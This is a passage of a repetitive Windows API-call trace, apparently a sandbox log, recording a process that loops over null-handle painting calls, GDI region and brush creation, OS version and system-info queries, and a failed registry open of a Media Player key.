lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.688] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.688] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.688] BeginPath (hdc=0x0) returned 0 [0017.688] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.688] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.688] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.688] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.689] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.689] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc704027d [0017.689] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd1040713 [0017.689] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2b [0017.689] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2c [0017.689] CombineRgn (hrgnDst=0x1040c2b, hrgnSrc1=0xc704027d, hrgnSrc2=0xd1040713, iMode=1) returned 1 [0017.689] CombineRgn (hrgnDst=0x1040c2c, hrgnSrc1=0xc704027d, hrgnSrc2=0xd1040713, iMode=4) returned 2 [0017.689] CreateSolidBrush (color=0xff) returned 0x2100c2a [0017.689] CreateSolidBrush (color=0xff0000) returned 0x1100c2d [0017.689] DeleteObject (ho=0x1100c2d) returned 1 [0017.689] DeleteObject (ho=0xd1040713) returned 1 [0017.689] DeleteObject (ho=0xc704027d) returned 1 [0017.689] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.689] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.689] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.689] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.689] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.689] BeginPath (hdc=0x0) returned 0 [0017.689] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.689] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.689] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.689] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.689] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.689] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.689] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.690] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd2040713 [0017.690] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc804027d [0017.690] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2e [0017.690] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c2f [0017.690] CombineRgn (hrgnDst=0x1040c2e, hrgnSrc1=0xd2040713, hrgnSrc2=0xc804027d, iMode=1) returned 1 [0017.690] CombineRgn (hrgnDst=0x1040c2f, hrgnSrc1=0xd2040713, hrgnSrc2=0xc804027d, iMode=4) returned 2 [0017.690] CreateSolidBrush (color=0xff) returned 0x2100c2d [0017.690] CreateSolidBrush (color=0xff0000) returned 0x1100c30 [0017.690] DeleteObject (ho=0x1100c30) returned 1 [0017.690] DeleteObject (ho=0xc804027d) returned 1 [0017.690] DeleteObject (ho=0xd2040713) returned 1 [0017.690] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.690] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.690] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.690] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.690] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.690] BeginPath (hdc=0x0) returned 0 [0017.690] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.690] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.690] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.690] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.690] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.690] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.690] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.690] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc904027d [0017.690] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd3040713 [0017.690] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c31 [0017.691] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c32 [0017.691] CombineRgn (hrgnDst=0x1040c31, hrgnSrc1=0xc904027d, hrgnSrc2=0xd3040713, iMode=1) returned 1 [0017.691] CombineRgn (hrgnDst=0x1040c32, hrgnSrc1=0xc904027d, hrgnSrc2=0xd3040713, iMode=4) returned 2 [0017.691] CreateSolidBrush (color=0xff) returned 0x2100c30 [0017.691] CreateSolidBrush (color=0xff0000) returned 0x1100c33 [0017.691] DeleteObject (ho=0x1100c33) returned 1 [0017.691] DeleteObject (ho=0xd3040713) returned 1 [0017.691] DeleteObject (ho=0xc904027d) returned 1 [0017.691] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.691] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.691] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.691] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.691] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.691] BeginPath (hdc=0x0) returned 0 [0017.691] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.691] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.691] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.691] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.691] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.691] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.691] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.691] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd4040713 [0017.691] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca04027d [0017.691] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c34 [0017.691] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c35 [0017.692] CombineRgn (hrgnDst=0x1040c34, hrgnSrc1=0xd4040713, hrgnSrc2=0xca04027d, iMode=1) returned 1 [0017.692] CombineRgn (hrgnDst=0x1040c35, hrgnSrc1=0xd4040713, hrgnSrc2=0xca04027d, iMode=4) returned 2 [0017.692] CreateSolidBrush (color=0xff) returned 0x2100c33 [0017.692] CreateSolidBrush (color=0xff0000) returned 0x1100c36 [0017.692] DeleteObject (ho=0x1100c36) returned 1 [0017.692] DeleteObject (ho=0xca04027d) returned 1 [0017.692] DeleteObject (ho=0xd4040713) returned 1 [0017.692] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.692] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.692] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.692] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.692] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.692] BeginPath (hdc=0x0) returned 0 [0017.692] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.692] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.692] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.692] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.692] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.692] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.692] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.692] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb04027d [0017.692] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd5040713 [0017.692] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c37 [0017.692] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c38 [0017.692] CombineRgn (hrgnDst=0x1040c37, hrgnSrc1=0xcb04027d, hrgnSrc2=0xd5040713, iMode=1) returned 1 [0017.692] CombineRgn (hrgnDst=0x1040c38, hrgnSrc1=0xcb04027d, hrgnSrc2=0xd5040713, iMode=4) returned 2 [0017.692] CreateSolidBrush (color=0xff) returned 0x2100c36 [0017.692] CreateSolidBrush (color=0xff0000) returned 0x1100c39 [0017.692] DeleteObject (ho=0x1100c39) returned 1 [0017.692] DeleteObject (ho=0xd5040713) returned 1 [0017.692] DeleteObject (ho=0xcb04027d) returned 1 [0017.693] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.693] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.693] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.693] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.693] BeginPath (hdc=0x0) returned 0 [0017.693] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.693] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.693] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.693] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.693] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.693] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.693] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd6040713 [0017.693] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc04027d [0017.693] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3a [0017.693] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3b [0017.693] CombineRgn (hrgnDst=0x1040c3a, hrgnSrc1=0xd6040713, hrgnSrc2=0xcc04027d, iMode=1) returned 1 [0017.693] CombineRgn (hrgnDst=0x1040c3b, hrgnSrc1=0xd6040713, hrgnSrc2=0xcc04027d, iMode=4) returned 2 [0017.693] CreateSolidBrush (color=0xff) returned 0x2100c39 [0017.693] CreateSolidBrush (color=0xff0000) returned 0x1100c3c [0017.693] DeleteObject (ho=0x1100c3c) returned 1 [0017.693] DeleteObject (ho=0xcc04027d) returned 1 [0017.693] DeleteObject (ho=0xd6040713) returned 1 [0017.693] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.693] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.694] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.694] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.694] BeginPath (hdc=0x0) returned 0 [0017.694] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.694] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.694] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.694] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.694] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.694] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.694] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.694] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd04027d [0017.694] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd7040713 [0017.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3d [0017.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c3e [0017.694] CombineRgn (hrgnDst=0x1040c3d, hrgnSrc1=0xcd04027d, hrgnSrc2=0xd7040713, iMode=1) returned 1 [0017.694] CombineRgn (hrgnDst=0x1040c3e, hrgnSrc1=0xcd04027d, hrgnSrc2=0xd7040713, iMode=4) returned 2 [0017.694] CreateSolidBrush (color=0xff) returned 0x2100c3c [0017.694] CreateSolidBrush (color=0xff0000) returned 0x1100c3f [0017.694] DeleteObject (ho=0x1100c3f) returned 1 [0017.694] DeleteObject (ho=0xd7040713) returned 1 [0017.694] DeleteObject (ho=0xcd04027d) returned 1 [0017.694] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.694] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.694] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.694] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.694] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.694] BeginPath (hdc=0x0) returned 0 [0017.694] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.694] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.694] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.694] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.694] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.695] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.695] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd8040713 [0017.695] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce04027d [0017.695] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c40 [0017.695] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c41 [0017.695] CombineRgn (hrgnDst=0x1040c40, hrgnSrc1=0xd8040713, hrgnSrc2=0xce04027d, iMode=1) returned 1 [0017.695] CombineRgn (hrgnDst=0x1040c41, hrgnSrc1=0xd8040713, hrgnSrc2=0xce04027d, iMode=4) returned 2 [0017.695] CreateSolidBrush (color=0xff) returned 0x2100c3f [0017.695] CreateSolidBrush (color=0xff0000) returned 0x1100c42 [0017.695] DeleteObject (ho=0x1100c42) returned 1 [0017.695] DeleteObject (ho=0xce04027d) returned 1 [0017.695] DeleteObject (ho=0xd8040713) returned 1 [0017.695] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.695] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.695] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.695] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.695] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.695] BeginPath (hdc=0x0) returned 0 [0017.695] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.695] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.695] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.695] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.695] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.695] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.696] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf04027d [0017.696] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd9040713 [0017.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c43 [0017.696] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c44 [0017.696] CombineRgn (hrgnDst=0x1040c43, hrgnSrc1=0xcf04027d, hrgnSrc2=0xd9040713, iMode=1) returned 1 [0017.696] CombineRgn (hrgnDst=0x1040c44, hrgnSrc1=0xcf04027d, hrgnSrc2=0xd9040713, iMode=4) returned 2 [0017.696] CreateSolidBrush (color=0xff) returned 0x2100c42 [0017.696] CreateSolidBrush (color=0xff0000) returned 0x1100c45 [0017.696] DeleteObject (ho=0x1100c45) returned 1 [0017.696] DeleteObject (ho=0xd9040713) returned 1 [0017.696] DeleteObject (ho=0xcf04027d) returned 1 [0017.696] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.696] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.696] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.696] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.696] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.696] BeginPath (hdc=0x0) returned 0 [0017.696] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.696] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.696] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.696] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.696] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.696] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.696] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.696] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", 